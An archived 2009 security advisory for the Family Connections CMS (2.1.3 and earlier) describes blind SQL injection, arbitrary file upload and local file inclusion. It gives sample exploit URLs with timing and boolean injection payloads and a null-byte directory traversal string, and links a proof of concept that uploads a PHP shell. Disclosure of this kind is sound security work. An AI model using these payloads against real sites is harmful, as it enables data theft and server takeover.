AOH :: HP Unsorted F :: BU-1282.HTM

Family Connections <= 2.1.3 Multiple Remote Vulnerabilities



Family Connections <= 2.1.3 Multiple Remote Vulnerabilities
Family Connections <= 2.1.3 Multiple Remote Vulnerabilities



Family Connections <= 2.1.3 Multiple Remote Vulnerabilities

=C2 Name =C2  =C2  =C2  =C2  =C2  =C2  =C2 Family Connections
=C2 Vendor =C2  =C2  =C2  =C2  =C2  =C2 http://www.familycms.com
=C2 Versions Affected <= 2.1.3

=C2 Author =C2  =C2  =C2  =C2  =C2  =C2 Salvatore Fresta aka Drosophila
=C2 Website =C2  =C2  =C2  =C2  =C2  http://www.salvatorefresta.net
=C2 Contact =C2  =C2  =C2  =C2  =C2  salvatorefresta [at] gmail [dot] com
=C2 Date =C2  =C2  =C2  =C2  =C2  =C2  =C2 2009-12-16

X. INDEX

=C2 I. =C2  =C2 ABOUT THE APPLICATION
=C2 II. =C2  DESCRIPTION
=C2 III. =C2 ANALYSIS
=C2 IV. =C2  SAMPLE CODE
=C2 V. =C2  =C2 FIX
=C2 VI. =C2  DISCLOSURE TIMELINE


I. ABOUT THE APPLICATION

Based on one of the world's leading structure =C2 and content
management systems - WebSiteAdmin, WSCreator =C2 (WS standing
for WebSite) is powerful application for handling multiple
websites. This is a commercial application.
Keep your family "Connected" with this content =C2 management
system (CMS) designed specifically with family's =C2 in mind.
Key =C2 features =C2 are: =C2 a message =C2 board, =C2 a =C2 photo =C2 gallery,
a =C2  blog-like =C2  "Family News" =C2  section, =C2 a =C2 calendar, =C2 an
address book and recipe sharing section.
Each family =C2 member has their own =C2 personal settings, like
the ability to change the website's theme.
Now with Portuguese, Czech, English, Estonian, German, and
Spanish language Support....


II. DESCRIPTION

Many fields are not properly sanitised and some checks can
be bypassed.


III. ANALYSIS

Summary:

=C2 A) Multiple Blind SQL Injection
=C2 B) Multiple Arbitrary File Upload
=C2 C) Local File Inclusion

A) Blind SQL Injection

All =C2 field =C2 that =C2 I =C2 tested =C2 are =C2 vulnerable =C2 to Blind SQL
Injection.
I can't report all vulnerable files because they are many.
The most injections don't require =C2 that =C2 Magic Quotes GPC
(php.ini) is setted to Off.
However an attacker may try to exploit this vulnerability
using the full path disclosure released by the MySQL error
to =C2 write a =C2 file =C2 into the =C2 remote file system, =C2 using as
destination =C2 path =C2 the =C2 gallery =C2 directories, =C2 where =C2  the
permissions must be setted to 777.


B) Multiple Arbitrary File Upload

When we want to write a module to upload a =C2 file, =C2 we must
check =C2 the file =C2 extension =C2 without using the Content-Type
HTTP field, =C2 because =C2 this last =C2 one can be =C2 changed. This
CMS uses the Content-Type to validate the extension.


C) Local File Inclusion

In settings.php an user can set the favorite theme to use.
This theme is included using the include_once PHP function.
The =C2 original =C2 path =C2 is =C2 themes/ =C2 but using =C2 the directory
traversal sequence, an user can include arbitrary files.
There =C2 is a =C2 limit of characters =C2 to use, infact the theme
field into the database has a length limit equal to 25.


IV. SAMPLE CODE

A) Multiple Blind SQL Injection

http://site/path/profile.php?member=1 AND IF(ASCII((SELECT CHAR(90))) 
= 90, BENCHMARK(10000000, MD5(0x90)), NULL)

http://site/path/messageboard.php?thread=1 AND 1=1 
http://site/path/messageboard.php?thread=1 AND 1=0 

B) Multiple Arbitrary File Upload

A PoC that upload a PHP shell can be downloaded here:
http://www.salvatorefresta.net/files/poc/PoC-FC213.c 


C) Local File Inclusion

Edit =C2 the POST =C2 packet and =C2 send the modified =C2 theme value
like the following: ../ReadMe.txt\0


V. FIX

No Fix.


VIII. DISCLOSURE TIMELINE

2009-12-16 Bug discovered
2009-12-16 Initial vendor contact
2009-12-16 Advisory Release

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.